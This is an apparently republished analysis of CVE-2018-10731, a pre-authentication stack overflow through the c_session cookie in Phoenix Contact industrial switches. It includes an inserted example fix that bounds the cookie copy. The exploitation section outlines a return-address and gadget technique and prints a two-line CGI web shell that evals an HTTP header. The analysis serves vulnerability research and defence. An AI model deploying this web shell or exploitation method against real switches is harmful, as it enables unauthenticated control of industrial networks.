How to analyze the industrial switch vulnerability CVE-2018-10731

2025-01-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

In this issue, the editor brings you an analysis of the industrial switch vulnerability CVE-2018-10731. The article is rich in content and analyzes the issue from a professional point of view. I hope you get something out of reading it.

The editor analyzes the CVE-2018-10731 vulnerability in Phoenix Contact FL SWITCH 3xxx, FL SWITCH 4xxx and FL SWITCH 48xx series switches. The vulnerability lies in the device's web interface and allows arbitrary code execution without knowledge of the device credentials.

Vulnerability analysis

The devices mentioned above run Linux and are configured through a web interface. As on many other household and industrial IoT devices, the web interface consists of many CGI applications that process users' HTTP requests. In the case of this article, the CGI applications use the cgic library, which makes it easier to process HTTP requests; the library's functionality is built into the libipinfusionweb.so shared library in the device file system.

When processing an HTTP request, the web server passes the user request data to the CGI application as a set of environment variables. Their initial processing is performed by the main function in the libipinfusionweb library. Next, the main function calls the cgiMain function of the CGI application, where the request is processed further.

Figure 1. Processing HTTP requests

In the course of its work, the main function of the libipinfusionweb library calls the get_login_user function, which uses the passed cookie value to determine whether the user has been authenticated by the system.

Figure 2. Code snippet of main function

The function get_login_user uses the cookies_get_value function to get the value of the c_session cookie parameter and stores it in the local_e0 variable. The variable local_e0 is a single-byte character array of length 0x80 and is located at a distance of 0xE0 from the beginning of the stack.

Figure 3. Code snippet of get_login_user function

However, as you can see from the code of the cookies_get_value function, the maximum length of the cookie parameter value obtained using the cgiCookieString function is 0x400 bytes.

Figure 4. Code snippet of cookies_get_value function

Therefore, when a cookie parameter longer than 0xE0 (224) characters is passed, the get_login_user function saves the value of this parameter to its stack, and as a result, all information on the stack following the local_e0 variable is overwritten, including the function return address.

Note: when one function calls another, the return address is stored on the stack. When the called function completes, control is transferred to the return address. Therefore, whoever overwrites this address controls the program's execution flow. For example, an attacker can replace this address with the address of malicious shellcode located in the program's address space.

Note that the overwriting of the return address occurs prior to authentication, which makes it possible for an attacker who does not know the device account to exploit this vulnerability.
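The missing length check described above, shown as it could look in a corrected copy routine. This is an added example, not code from the article or from the device firmware: the function names find_cookie and get_session_checked and the sample Cookie header are hypothetical, and only the cookie name c_session and the 0x80 buffer size are taken from the analysis.

```c
#include <stdio.h>
#include <string.h>

#define SESSION_BUF_LEN 0x80  /* size of local_e0 in get_login_user, per the article */

/* Locate "name=value" in a Cookie header; return the value and set *len.
 * Returns NULL when the cookie is absent. */
static const char *find_cookie(const char *hdr, const char *name, size_t *len)
{
    size_t nlen = strlen(name);
    const char *p = hdr, *end;
    while (*p) {
        while (*p == ' ' || *p == ';') p++;          /* skip separators */
        end = strchr(p, ';');
        if (!end) end = p + strlen(p);
        if ((size_t)(end - p) > nlen && p[nlen] == '=' && strncmp(p, name, nlen) == 0) {
            *len = (size_t)(end - p) - nlen - 1;
            return p + nlen + 1;
        }
        p = end;
    }
    return NULL;
}

/* Bounded replacement for the unchecked strcpy: the value is rejected, not
 * truncated, when it does not fit the fixed buffer.
 * Returns 0 on success, -1 if c_session is absent, -2 if it is oversized. */
int get_session_checked(const char *cookie_hdr, char out[SESSION_BUF_LEN])
{
    size_t len = 0;
    const char *val;
    out[0] = '\0';
    val = cookie_hdr ? find_cookie(cookie_hdr, "c_session", &len) : NULL;
    if (!val) return -1;
    if (len >= SESSION_BUF_LEN) return -2;           /* would run past local_e0 */
    memcpy(out, val, len);
    out[len] = '\0';
    return 0;
}

int main(void)
{
    char user[SESSION_BUF_LEN];
    char hdr[0x200] = "lang=en; c_session=";         /* constructed sample input */
    size_t n = strlen(hdr);
    memset(hdr + n, 'A', 0xE0);                      /* 0xE0 bytes, the length cited above */
    hdr[n + 0xE0] = '\0';
    printf("oversized: %d, normal: %d\n", get_session_checked(hdr, user),
           get_session_checked("c_session=abc123; lang=en", user));
    return 0;
}
```

The same length test (c_session value of 0x80 bytes or more) can serve as a filtering rule on a reverse proxy placed in front of unpatched devices.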

Exploitation

We considered several ways to demonstrate the possibility of exploiting this vulnerability. The easiest way is to write the payload code on the stack (0x400 - 0xE0 = 800 bytes left, which is enough for the code), and then overwrite the return address with the address of that code. This is feasible in theory because the processor of the vulnerable switches does not support the NX bit (that is, it allows execution of code located anywhere, including the stack), but in practice there are serious restrictions.

These switch processors have a MIPS architecture, in which many processor instructions are encoded as byte sequences that contain zero bytes. Writing to the buffer ends when the first null byte is encountered (due to the use of the strcpy function), so only opcodes that do not contain null bytes can be used, but this is not possible because any payload uses at least a few null bytes.

Similarly, when building a ROP chain, you will have to face the limitation of null bytes: the addresses of the ROP gadgets must not contain zeros, which greatly complicates the address search. In general, we can only use the one zero copied by the strcpy function, which limits the creation of a complete ROP chain. In addition, we need very few gadgets. However, the following code snippet was found when searching the libipinfusionweb library:

Figure 5. Executable code snippet of the libipinfusionweb library

Assuming that the contents of register $s0 are controlled, this code snippet uses the mysystem function to execute an OS command (the function initially had no name, but we renamed it because it is very similar to the system function in Linux).

Since we are overwriting the return address of the get_login_user function, the function will execute to the end. At the end of the get_login_user function, you can see that the value of register $s0 is restored from the value previously saved on the stack (offset 0xD8 from the top of the stack). At this point, however, the stack area is under our control, that is, we can actually control the contents of register $s0 and so execute arbitrary OS commands using the mysystem function.

Figure 6. Executable code snippet of get_login_user function

Therefore, in order to successfully demonstrate this exploit, the c_session cookie parameter string that needs to be sent should contain the following:

OS command string, which is then passed to the mysystem function

Address of the OS command on the stack

New return address (address of the code snippet shown in figure 5)

The final payload should be as follows:

Figure 7. Payload

So far, we have exploited the vulnerability to obtain a shell on the device, which requires administrator privileges. As a result, we can get additional information that is helpful for the follow-up operations:

ASLR is disabled on the device under study, so the addresses of the gadget and OS commands used will always be the same.

Figure 8. ASLR status on the device being studied

The range of memory addresses in which the stack may be located. In order to calculate the exact address, we traversed all the addresses in the range.

As a payload, we implemented the loading of a web shell, a CGI application, which is as follows:

#!/bin/sh
eval $HTTP_CMD 2>&1

According to the CGI protocol, the contents of HTTP headers are passed to the CGI application as environment variables whose names consist of HTTP_ followed by the header name, so the shell executes the contents of the HTTP header CMD using the eval command. The following figure shows the result of successfully running the loaded shell and executing the ls command with it.

Figure 9. Result of successfully running the loaded shell and executing the ls command

The ability to exploit this vulnerability is shown above, and as we have already mentioned, exploitation does not require knowing a password, so it can even be performed by an unauthenticated attacker.

Compromising an industrial network switch may compromise the entire network environment, and the interruption of network communication will adversely affect the industrial process, up to a complete stop.

The above is the analysis of the industrial switch vulnerability CVE-2018-10731 shared by the editor. If you happen to have similar questions, you may refer to the above analysis. If you want to know more about it, you are welcome to follow the industry information channel.
